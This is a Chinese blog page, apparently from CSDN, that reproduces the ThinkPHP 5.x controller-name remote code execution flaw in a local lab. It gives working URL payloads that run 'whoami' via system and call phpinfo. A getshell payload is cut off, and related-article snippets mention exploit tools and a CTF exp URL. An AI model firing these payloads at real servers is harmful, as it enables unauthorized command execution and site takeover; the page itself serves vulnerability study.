thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行漏洞复现

最新推荐文章于 2023-08-22 11:01:59 发布
最新推荐文章于 2023-08-22 11:01:59 发布
阅读量552 收藏
点赞数
文章标签: thinkphp5调用shell脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34566429/article/details/111924226
版权
本文详细介绍了ThinkPHP5框架的远程命令执行漏洞,包括漏洞描述、影响版本和复现步骤。通过利用system函数和call_user_func_array等,演示了如何执行远程命令、查看phpinfo以及写入shell。同时,文章提醒读者关注安全防护,避免类似漏洞的发生。
摘要由CSDN通过智能技术生成

一、漏洞描述

2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞:

漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。

二、漏洞影响版本

Thinkphp 5.x-Thinkphp 5.1.31

Thinkphp 5.0.x<=5.0.23

三、漏洞复现

2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://192.168.10.171/thinkphp5.0.22/public

3、利用system函数远程命令执行

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

4、通过phpinfo函数查看phpinfo()的信息

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

5、写入shell

Payload如下:

?s=/index/\think\app/invokefunction&f

最低0.47元/天 解锁文章
知乎营销
关注
thinkphp3.1.3 getshell_ThinkPHP3由注入导致的getshell
weixin_39585035的博客
11-21 2144
起因搞一个thinkphp3.1.3开发的贷款诈骗站。大佬通过xss钓鱼,让管理员下载免杀的木马上线,然后拿到了源码。审计源码发现前台存在因为$_REQUEST获取数据而导致的注入,但是密码加密方式为:解开密码的概率不大,同时在后台也没能找到getshell的地方。类似钓鱼,诈骗这类的网站几乎都是在和数据库交互,操作文件的地方比较少。正文Demo如下:我这里使用的thinkphp3.2....
linux最新漏洞thinkphp,thinkphp5.0.x最新命令执行漏洞复现及扫描脚本编写
weixin_36473855的博客
05-16 2411
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?漏洞复现2019.1.11日,thinkphp官方再次公布了一个tp5代码执行漏洞影响范围:5.0.x ~ 5.0.23漏洞代码详情参考:https://blog.csdn.net/qq_29647709/article/details/86307859提示:经过测试5.0.0-5.0.20版本使用的payload与5....
thinkphp6.0 配合shell 脚本 定时任务
最新发布
xxpxxpoo8的专栏
08-22 945
【代码】thinkphp6.0 配合shell 脚本 定时任务。
ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞
Ambulong的博客
12-11 5515
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 在线环境地址:https://www.vulnspy.com/cn-thinkphp-5.x-rce/ 执行phpi...
ThinkPHP 远程命令执行漏洞复现(GetShell)
热门推荐
xy_sugar的博客
12-14 28万+
漏洞概况 ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞漏洞危害 攻击者可通过该漏洞获取...
thinkphp5调用shell脚本_ThinkPHP 5.x远程命令执行测试工具(可getshell
weixin_39841825的博客
12-23 1325
该工具只能授权验证网站漏洞和站长验证漏洞使用。禁止用于未授权测试,非法入侵,否则一切后果自负,和作者无关。影响范围5.x < 5.1.315.x <= 5.0.23以下基于ThinkPHP5 二次开发的内容管理系统,很可能受到该漏洞影响,建议厂商及时更新。AdminLTE后台管理系统layui后台管理系统thinkcmfH-ui.admin后台管理系统tpshopFsatAdminey...
thinkphp5调用shell脚本_【漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)
weixin_39906358的博客
01-16 331
0x00复现环境0x01步骤0x02漏洞原理分析关键代码在修复之前程序未对控制器进行过滤,导致攻 击 者可以通过引入 \ 符号来调用任意类方法。$this -> app -> controller 方法来实例化控制器,然后调用实例中的方法。follow the controller method:thinkphp/library/think/App.php通过parseModuleAn...
thinkphp5调用shell脚本_thinkphp5.x命令执行漏洞复现及环境搭建
weixin_42114046的博客
02-11 516
楼主Linux环境是Centos7,LAMP怎么搭不用我废话吧,别看错了1.安装composeryum -y install composer安装php拓展yum -y install php-mysql php-gd libjpeg* php-ldap php-odbc php-pear php-xml php-xmlrpc php-mbstring php-bcmath php-mhash -...
thinkphp5调用shell脚本_thinkphp5.x全版本任意代码执行getshell
weixin_32308155的博客
12-23 491
ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。主要是因为”\“的错误补丁:环境地址:漏洞利用1.远程命令执行exp:http://localhost:9096/inde...
python3编写ThinkPHP命令执行Getshell的方法
09-19
主要介绍了python3编写ThinkPHP命令执行Getshell的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
ThinkPHP v5.x命令执行利用工具(可getshell
thinkphp5调用shell脚本_【ThinkPHP5】远程代码执行
weixin_39607710的博客
01-03 509
跟着小编一起动手操作吧!ThinkPHP5远程代码执行漏洞实验内容ThinkPHP是一个免费开源的快速、简单、面向对象的轻量级PHP开发框架,是为了敏捷Web应用开发和简化企业应用开发而诞生。ThinkPHP 5.0版本是一个颠覆和重构版本,采用全新的架构思想,引入了更多的PHP新特性,优化了核心,减少了依赖,实现了真正的惰性加载,支持composer,并针对API开发做了大量的优化。ThinkP...
php版本%3e=5.6,ThinkPHP5.0版本 远程命令执行漏洞GetShell
weixin_42303112的博客
03-19 242
https://blog.csdn.net/Fly_hps/article/details/84954664漏洞概况ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。由于框架对控制器名没有进行足够...
php 远程执行sh,ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL
weixin_35067976的博客
03-23 237
Thinkphp 下载地址:http://www.thinkphp.cn/donate/download/id/1125.html ThinkPHP5.0.15完整版本地环境搭建phpstudy ,在WWW根目录建立文件夹放入代码如果想要开启 debug 报错 在目录建立 文件里面的内容写: APP_DEBUG = true成功开启debug报错漏洞复现漏洞exp: index...
php文件包含日志,ThinkPHP 5日志文件包含trick
weixin_39690391的博客
03-23 259
而且只有触发报错的时候才会写入部分日志信息,如下:而直接用url传入php代码,空格会被urlencode观察日志信息,与及分析代码,可控有蓝色框的请求IP地址,红色圆圈的请求方法,与及后面的host和请求uri对应代码:一个个分析一下:ip可以用X-Forwarded-For等,但最后都过滤了method:host:uri:可以发现可用的选择还挺多的:method可以用X-HTTP-METHOD...
ThinkPHP 5.0 get SHELL
q412539429的博客
02-19 996
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f 路由信息中controller的部分进行了过滤,可知问题出现在路由调度时 关键代码: 在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 1.利用sys...
thinkphp5调用shell脚本_tp5或thinkphp5执行shell命令定时执行命令行运行php脚本
weixin_39731916的博客
12-23 1618
application\common.php文件内容如下:return ['app\shell\command\Test',];application\shell\command\Test.php内容如下:namespace app\shell\command;use think\console\Command;use think\console\Input;use think\console\O...
XCTF-攻防世界CTF平台-Web类——3、php_rce(ThinkPHP V5.0框架远程代码执行漏洞
Onlyone_1314的博客
09-03 1116
先访问题目场景: 主页提示我们:网页使用的是ThinkPHP框架,版本为5.0 这道题主要是考察:ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本。 攻击的exp是:http://111.200.241.244:61059/index.php?s=index/\think\app/invokefuncti
ThinkPHP5.0.* Request类远程代码执行漏洞分析
"这篇文档主要讨论的是ThinkPHP框架中的一个安全漏洞,具体是关于request函数的远程代码执行问题,涉及到的文件是library/think/Request.php的541至603行。此问题影响ThinkPHP 5.0.*版本。攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值